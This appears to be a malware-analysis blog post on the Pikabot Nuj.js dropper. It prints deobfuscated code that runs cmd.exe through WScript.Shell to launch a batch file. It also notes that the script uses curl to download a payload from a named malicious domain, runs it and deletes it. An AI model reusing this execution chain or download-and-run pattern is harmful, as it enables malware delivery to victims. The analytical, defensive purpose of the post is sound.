Analyzing Pikabot Malicious JavaScript
Introduction
I came across Pikabot infection, which utilizes a JavaScript file to download a malicious payload. According to any.run, it leverages Nuj.js as its initial adversarial point. To delve deeper into the analysis, I turned to Malware Traffic Analysis, my preferred site for malware research. After downloading the malware and artifacts zip file, I opened up a virtual installation of REMnux, a Linux toolkit tailored for reverse-engineering and analyzing malicious software.
Initial Code Inspection
Opening the Nuj.js file as text, we encounter extensive comments and heavily obfuscated JavaScript code. This obfuscation technique is designed to evade detection by pattern-matching algorithms. by intentionally obscuring the underlying patterns or structures within the data or code. This makes it more challenging for automated systems or algorithms to recognize and interpret the intended meaning or functionality.
Deobfuscation Process
The first step involves running regex to eliminate comments, leaving us with heavily obfuscated code. However, leveraging ChatGPT’s capability, we easily transform this into readable and nicely formatted code.
// Set initial empty strings
let trueString = '';
let falseString = '';
// Build true and false strings
trueString += 'true';
falseString += 'false';
// Function to execute commands
function executeCommand(command) {
return eval(command);
}
// Function to execute a specific command
function executeSpecificCommand(funcName, parameter) {
let command = '"' + funcName + '".match(" ' + parameter + ' ")';
return executeCommand(command);
}
// Function to execute a command with parameters
function executeWithParams(param1, param2, param3) {
let command = 'new ActiveXObject("WScript.Shell").Run("' + param1 + '", ' + param2 + ', ' + param3 + ')';
executeCommand(() => {
executeCommand(command);
});
}
// Function to handle errors and execute a function
function handleErrorAndExecute(callback) {
try {
new SomeObject();
} catch (error) {
let errorMessage = '';
errorMessage += 'undefined';
if (executeSpecificCommand(errorMessage)) {
callback();
}
}
}
// Function to execute a specific command with parameters
function executeSpecificWithParams(parameter) {
let systemCommand = 'cmd.exe /c ' + parameter;
executeWithParams(systemCommand, falseString, trueString);
}
// Call the functions with specific parameters
executeSpecificWithParams('temp\dolorem.bat');
handleErrorAndExecute(() => {
executeSpecificWithParams('temp\dolorem.p.bat');
});
Code Execution Analysis
The provided code snippet creates a WScript.Shell instance, runs cmd.exe, and executes a batch file named dolorem.bat. Further analysis necessitates running the code within a sandbox environment to debug and uncover the full commands. For this purpose, I’ll utilize Box.js, pre-installed on REMnux.
Box.js Usage
Box.js emulates a Windows JScript environment, providing a summary of the emulation on the console. It creates a folder named sample.js.results, containing various analysis artifacts such as analysis.log, snippets.json, urls.json, etc.
IOC.json Analysis
Opening IOC.json, we observe the following behaviors:
- Attempted deletion of a .jse file.
- It uses two commands to create a curl command grabbing the contents of a file on shakyastatuestrade.com and outputting it to a file called dolorem.
- Runs the dolorem file
- Deletes the dolorem file, once it’s in the memory, to hide itself
